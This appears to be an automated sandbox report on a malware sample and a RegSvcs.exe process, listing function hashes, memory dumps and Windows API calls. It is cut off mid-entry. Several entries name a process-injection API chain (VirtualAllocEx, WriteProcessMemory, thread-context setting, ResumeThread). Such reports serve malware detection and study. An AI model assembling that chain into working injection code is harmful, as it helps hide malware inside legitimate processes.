Instruction ID: 44252c471eb3993a62684197c04a2806e61fc5b83f64c1f4a579fc7414780e75
Opcode Fuzzy Hash: 6e725e01e54a2be18796d180e71d58895471954f17f0271705431f3f810b5a07
Instruction Fuzzy Hash: C95167B09012498FDB58DFAAD549BEEBFF5FF48314F208859E009A72A0D7345944CF65

Function 0799CBD5 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0799CE16

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5a435aa47b1fda42c3fd0e24304a953a6350b6d1d97850b7ba4156a8f42f2461
Instruction ID: 0d128b994f69bb56d39582bc7dbe22b681b11c3a8c392e8ff63684d26fa3c3a1
Opcode Fuzzy Hash: 5a435aa47b1fda42c3fd0e24304a953a6350b6d1d97850b7ba4156a8f42f2461
Instruction Fuzzy Hash: 55A13AB1D0021ACFEF20CFA8CD417EDBBB6BB49314F148569D809A7294DB749985CBA1

Function 0799CBE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0799CE16

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d96913da583dae083d89f7f633d3fc4a47df2d2405e2b3aad2fbd4dbef6d7580
Instruction ID: ef62d6cd8bd16df6c85b96876822efd149c3b264f800d843da433e39883ba509
Opcode Fuzzy Hash: d96913da583dae083d89f7f633d3fc4a47df2d2405e2b3aad2fbd4dbef6d7580
Instruction Fuzzy Hash: 57915BB1D0021ACFEF20CFA8CD407ADBBB6BF49314F048569D809A7294DB749985CFA1

Function 015044D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015059A9

Memory Dump Source

Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 99e3c7c45740870f72d26191b2ccc8404827394fff07bbc5c6bd62ef7cce801d
Instruction ID: 28ed243ea9ad2a4490c7b759400af64e50d915fffa36b84e8711eaefb3b44fd3
Opcode Fuzzy Hash: 99e3c7c45740870f72d26191b2ccc8404827394fff07bbc5c6bd62ef7cce801d
Instruction Fuzzy Hash: 0341D1B0C10719CBDB25DFA9C884BDDBBF5BF49304F20806AD418AB255DBB56949CF90

Function 015058F7 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015059A9

Memory Dump Source

Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e6dd11d7eabe4c6bf4fb611cc508ccbe86e58ac1dfa86e8dc20c55f095f5f42e
Instruction ID: 0b39995efd077779907aa807727e8fa39f408d1aaceef5659220688b8d49a843
Opcode Fuzzy Hash: e6dd11d7eabe4c6bf4fb611cc508ccbe86e58ac1dfa86e8dc20c55f095f5f42e
Instruction Fuzzy Hash: EF41E1B0C10719CEDB25CFA9C984BCDBBF6BF48304F20805AD418AB255DB75694ACF90

Function 0B030351 Relevance: 1.6, APIs: 1, Instructions: 78
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B03031D

Memory Dump Source

Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8b57baf7ac25aa1ca289197479fe7bdeb07977f2d4f7b7592ff6c51b54770820
Instruction ID: 98218b805a7aa80ea6b8ed9399861da3e2faddaa75c193e22b94c73f6a1e34cd
Opcode Fuzzy Hash: 8b57baf7ac25aa1ca289197479fe7bdeb07977f2d4f7b7592ff6c51b54770820
Instruction Fuzzy Hash: 1721CC729052188FDB15DBA4E9193EEBFF8AF48B10F14805AD841B7242D7782844CBA5

Function 0799C950 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0799C9E8

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 671cd3b02f5d1a23f9ce0434662129f17721a0249588506ecad7efbab367ce97
Instruction ID: eb87bc795dbd9e11ecad39559749e4095a615a0e0ef68d90843a4f83ae393253
Opcode Fuzzy Hash: 671cd3b02f5d1a23f9ce0434662129f17721a0249588506ecad7efbab367ce97
Instruction Fuzzy Hash: 272168B18003599FCB10CFA9C885BEEBFF5FF48324F10842AE559A7250D7789944CBA0

Function 0799C7B8 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0799C83E

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 105352b97a9cdebb10a6ef4061582583f4b41cd60c9990689d5b87228f540171
Instruction ID: f9e3e17528f723ad30a6571a8b590df5f466c593d17b748ebfde8286579d42f0
Opcode Fuzzy Hash: 105352b97a9cdebb10a6ef4061582583f4b41cd60c9990689d5b87228f540171
Instruction Fuzzy Hash: D22148B59002098FDB10DFAAC4857EEBBF4AF48324F10842AD459A7240DB789585CBA0

Function 0799C958 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0799C9E8

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 03627236e5e6ae6ea0bc7c603ca9e206f128a2de47924d8b315adc20b10296bf
Instruction ID: 80571474d9ab5edb05b1d1d204a09befd60542e2ef840b53810b0f060f2444e1
Opcode Fuzzy Hash: 03627236e5e6ae6ea0bc7c603ca9e206f128a2de47924d8b315adc20b10296bf
Instruction Fuzzy Hash: CD2127B59003099FDF10DFAAC985BEEBBF5FF48314F10842AE959A7250D7789944CBA0

Function 0799CA41 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0799CAC8

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bd7a42dc0795d75f6d7455660d5f9cec6b5b75c35752384be7169821268e53cf
Instruction ID: 6318ee44f74ec4a4319655e3900962d68b23fb00e257073ccab963577bc999e6
Opcode Fuzzy Hash: bd7a42dc0795d75f6d7455660d5f9cec6b5b75c35752384be7169821268e53cf
Instruction Fuzzy Hash: 54212AB18003599FDB10DFAAD945AEEFBF5FF48320F50842AE519A7250C7399944CBA0

Function 0799C7C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0799C83E

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4365359cb1ef895c8f50bcf1890e0539fc643e0c83302e4c033916e1e810c31f
Instruction ID: 818a0474bf254489b64ab69e3a1cbc3a83c498e41003af2bf66c59089d22d5d5
Opcode Fuzzy Hash: 4365359cb1ef895c8f50bcf1890e0539fc643e0c83302e4c033916e1e810c31f
Instruction Fuzzy Hash: 052137B1D002098FDB10DFAAC8857AEBBF4EF48324F508429D519A7240CB78A944CBA0

Function 0799CA48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0799CAC8

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 39a685c155e88a7801748b85a5206d91d23a659eb21cb0a45b8cd2bc9f20b205
Instruction ID: 3dd14430597ef0793a01d3a1d9e6066b716138367a2121cf1800b4e162e93b47
Opcode Fuzzy Hash: 39a685c155e88a7801748b85a5206d91d23a659eb21cb0a45b8cd2bc9f20b205
Instruction Fuzzy Hash: EF2109B1C003599FDB10DFAAC945AEEFBF5FF48310F508829E519A7250C7799944DBA0

Function 0150E5E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150E667

Memory Dump Source

Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 775455ae35a5f6e6a415e14ebbd9906eb087ecbfef402fcdbb3469c33924a7a2
Instruction ID: 010eba229dcc2f1e5a938cd1783cf09090a00e025d962174fc8fe42ccedb1276
Opcode Fuzzy Hash: 775455ae35a5f6e6a415e14ebbd9906eb087ecbfef402fcdbb3469c33924a7a2
Instruction Fuzzy Hash: 7621C6B59002489FDB10CF9AD984ADEBFF5FB48310F14841AE954A7350D378A944CFA5

Function 0799C890 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0799C906

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f155c4bb5b3cb217823e1e88fe92324d6162cb7aab7333f2c76bf3df4e3088bf
Instruction ID: e22a1b5b6e925365be61dfef03ec1b5640bbd4c55538a2d32865221fc0483f18
Opcode Fuzzy Hash: f155c4bb5b3cb217823e1e88fe92324d6162cb7aab7333f2c76bf3df4e3088bf
Instruction Fuzzy Hash: 051159B68002099FCB20DFAAD845BEFBFF5EF48324F108419E559A7250CB759544CBA0

Function 0799C709 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0799C772

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cda45b086b4ff22095119c230241e66bebc83c9aa0807f361617972ea9fbf978
Instruction ID: 44b462b7987ce802b79600de292e4c4d9ca1964a81c9c6609bbd818b1cb102ed
Opcode Fuzzy Hash: cda45b086b4ff22095119c230241e66bebc83c9aa0807f361617972ea9fbf978
Instruction Fuzzy Hash: A41179B18002498BDB20DFAAD4457EEFBF4AF49324F208419D019A7250CB38A544CFA0

Function 0799C898 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0799C906

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 942786b80cbe161705bc578f053590463c11cda5a21deb2439c106f54aa77262
Instruction ID: b01ed68847a3f5644f16a9263ade26b12cbb2b81665742ac13c89ea57d195329
Opcode Fuzzy Hash: 942786b80cbe161705bc578f053590463c11cda5a21deb2439c106f54aa77262
Instruction Fuzzy Hash: 6E1137B59002499FDB20DFAAC845BEFBFF5EF48324F108419E519A7250C779A544CFA0

Function 0799C710 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0799C772

Memory Dump Source

Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 970facd986dc463b9ef5609480c17a183a297184cb0f1eb37f5659ccee6aa3f0
Instruction ID: 470c523aa682fbd9514bdad6294a00fa92a9566e04aebdf183530207e3a6db39
Opcode Fuzzy Hash: 970facd986dc463b9ef5609480c17a183a297184cb0f1eb37f5659ccee6aa3f0
Instruction Fuzzy Hash: 8D113AB5D003498FDB20DFAAC8457AEFBF9EF89324F108419D519A7250CB79A544CFA0

Function 0B0302B8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B03031D

Memory Dump Source

Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b51e50f701ee58ccd11574d637a2d672da2115fefa42afa354f5a41a878d4bc8
Instruction ID: 5f7cecbcd5a30d90be649da092a8756a92386902b05c941af4ed45e8d68585ac
Opcode Fuzzy Hash: b51e50f701ee58ccd11574d637a2d672da2115fefa42afa354f5a41a878d4bc8
Instruction Fuzzy Hash: 0F11F5B58003489FDB20DF9AD449BDEBBF8FB48324F108459E559A3610C379A944CFA5

Function 0150C300 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0150C366

Memory Dump Source

Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 217c4c728dcace9254fd50a90f427008b5da26d4a54f82cf8d48f9bbfead4010
Instruction ID: 7fa1c68f779e456aa2a90751fe5f1b692324f37b127caab333636f7a1485504b
Opcode Fuzzy Hash: 217c4c728dcace9254fd50a90f427008b5da26d4a54f82cf8d48f9bbfead4010
Instruction Fuzzy Hash: 0D110FB5C003498FDB20DF9AD444ADEFBF4BB89220F10855AD928B7250C379A645CFA1

Function 0B0302C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B03031D

Memory Dump Source

Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b940151e82d82dace5a7f7e0214b4b1bd45e87fc3eb998802b659bced70a96c2
Instruction ID: 9d96d7b47dbd44cdff066b7b3da0e7c98b13f8a9b072fe2c46c2b88a5c95613e
Opcode Fuzzy Hash: b940151e82d82dace5a7f7e0214b4b1bd45e87fc3eb998802b659bced70a96c2
Instruction Fuzzy Hash: B71103B58003489FCB10DF9AD488BDEBBF8FB48320F108459E558A3210C379A544CFA5

Function 014AD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b888098b10bf734136164fde11c8d01e30071c36d92b25e4383c399abab7e9
Instruction ID: ee5111c034b738502a1a3f153adc12a5eebc0c7251001b26bdf3c546c51bb811
Opcode Fuzzy Hash: 85b888098b10bf734136164fde11c8d01e30071c36d92b25e4383c399abab7e9
Instruction Fuzzy Hash: E5210672904200DFDB06DF98D9C4B27BF65FB98320F61C56AE9090B766C33AD416CBA1

Function 014BD1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0b946104bda7532295b9b3a3585380df2e4cf96f7f29fd52d20523efe5fa66
Instruction ID: d133a2fe3bdd46ad0c96ee0769cc256d040526a96c91253f20f5ed8ae2a6373d
Opcode Fuzzy Hash: bd0b946104bda7532295b9b3a3585380df2e4cf96f7f29fd52d20523efe5fa66
Instruction Fuzzy Hash: 312125759042809FDB09DF98D5C0B16BF65FB88328F20C5AED8090B366C33AD806CAB1

Function 014BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea71467d2afd550f7cd1e4a944f08b04f411be8e590049f9dbf51a3f3995c68
Instruction ID: 13b224f7cbc13fcda7f1212341efd8c48315205255c71b93c50648c11c209c87
Opcode Fuzzy Hash: 6ea71467d2afd550f7cd1e4a944f08b04f411be8e590049f9dbf51a3f3995c68
Instruction Fuzzy Hash: A72103B1904200DFCB15DF68D9C0B16BF65EB8831CF20C5AAD90A0B366C33AD407CA71

Function 014BD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1584cfd287e3337ca828b27539bedc01eb4dd2dcb665e9626375e52a316e5223
Instruction ID: 930f4679844660b9ee82400902b799ce5ed27ca57563c1b7958e3e942dd9ae88
Opcode Fuzzy Hash: 1584cfd287e3337ca828b27539bedc01eb4dd2dcb665e9626375e52a316e5223
Instruction Fuzzy Hash: 232180755093808FDB03CF24D5D4716BF71EB46218F28C5DBD8498B2A7C33A980ACB62

Function 014AD1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction ID: c71e4c9e31e5646eb08929197838c29f0bf7b9070a9d50deefdb92898371a5a9
Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction Fuzzy Hash: FE21A276904240DFDB06CF54D9C4B16BF71FB94324F24C5AADD450B666C336D416CBA1

Function 014BD1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222628186.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14bd000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 0bdbb100861834c49ca01a30e881f37f6fa1ac19438dc74a8735c05f11328b63
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 6811D075904280CFDB06CF54D5C4B16BF61FB44328F24C6AAD8494B366C33AD40ACBA1

Function 014AD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d476b15d8b490cea7c019ed1c214b6c4f5989d5ed78e40f59b48d9f352f44ddf
Instruction ID: 2953e31cfeadaa4b9104c59215144ca3e0ab1276f59d7940218d9d704070b3ac
Opcode Fuzzy Hash: d476b15d8b490cea7c019ed1c214b6c4f5989d5ed78e40f59b48d9f352f44ddf
Instruction Fuzzy Hash: 45012079404384D9E7144A99CD84B57FF9CEF65320F58C427ED090A766C3799441C671

Function 014AD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2222550153.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14ad000_lyKbfEsVYfQfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf469ae3690b38cb82af795570f5e22d349c77a6b6c628281b1d7f17c7bb86c6
Instruction ID: ec8fbc9931993603a931ae5ba6d96c52bba39c10bec89914879eb2ff714ae5cd
Opcode Fuzzy Hash: cf469ae3690b38cb82af795570f5e22d349c77a6b6c628281b1d7f17c7bb86c6
Instruction Fuzzy Hash: 7BF0F675404384DEE7248A0ADC84B63FFA8EF61734F58C45BED090B396C3799840CAB0

Analysis Process: RegSvcs.exePID: 7740, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.6%
Total number of Nodes:	35
Total number of Limit Nodes:	4

Executed Functions

Function 056399A8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e90dfc3bf2beea67f0a48aff90f5a6089b608bcf23138458425256731413cb8
Instruction ID: dd1582fa3bdcb9dafad4fc75043ccf730bb8ad3bb429fa9451bfaa8bc124e480
Opcode Fuzzy Hash: 5e90dfc3bf2beea67f0a48aff90f5a6089b608bcf23138458425256731413cb8
Instruction Fuzzy Hash: 85F1D374E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB74A985CF50

Function 0563CE20 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0563CE71

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6378f967afb2039cfe549632d6668b893d92ec86ebf7f3f71efdd269bdd83519
Instruction ID: 2fec72a2eb954b0a51b5238a95051a5a5274cf5d11df8e76284a1bbee1ef2aa8
Opcode Fuzzy Hash: 6378f967afb2039cfe549632d6668b893d92ec86ebf7f3f71efdd269bdd83519
Instruction Fuzzy Hash: 604148B0D04209DBDB04CF99D585ADDFBB2BF88314F24C169E4096B385C731A98ACB90

Function 0101F138 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileExW.KERNELBASE(?,?,?,?), ref: 0101F2B5

Strings

Hnq, xrefs: 0101F193

Memory Dump Source

Source File: 00000011.00000002.3289212682.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1010000_RegSvcs.jbxd

Similarity

API ID: FileMove
String ID: Hnq
API String ID: 3562171763-2896580000
Opcode ID: 20f58ce9c6b0663f25fe2481c633f6f50e0263997e48786562357bb87f5689d6
Instruction ID: f366ffa2abbbf4c495a22e99255964963d78cd1a94ae7db1a1ef1d3943ab05a0
Opcode Fuzzy Hash: 20f58ce9c6b0663f25fe2481c633f6f50e0263997e48786562357bb87f5689d6
Instruction Fuzzy Hash: 2651F574E04249DFDB04DFA9D984ADEBBF2FF49300F14806AE449AB355D738A946CB50

Function 0563CFBC Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c17e15510d0f570b7611fa38e54ebd8be5fa123909879bd2f06ac9d114c14d9
Instruction ID: 68822638826f91a09ead33b85ec73461874622d375355c375ffff67b3138ba0f
Opcode Fuzzy Hash: 5c17e15510d0f570b7611fa38e54ebd8be5fa123909879bd2f06ac9d114c14d9
Instruction Fuzzy Hash: B0413774A04109DBDB04DF98D485AECBBB2FF49350F649159E40AAB381C735AD87CF50

Function 0563CF5C Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5630000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985904781e7cb34dd95947a65deb053e77671061316f3cb174854950c5876417
Instruction ID: 81903b3ebaadfae6234a3381b3f05024a49cba881e2e56f4da5b386ce3c9c57f
Opcode Fuzzy Hash: 985904781e7cb34dd95947a65deb053e77671061316f3cb174854950c5876417
Instruction Fuzzy Hash: 20411274A04209DFDB04CF98D485AECBBB2FF89354F649159E80ABB381C735A986CF50

Function 0563CE10 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0563CE71

Memory Dump Source

Source File: 00000011.00000002.3297437606.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

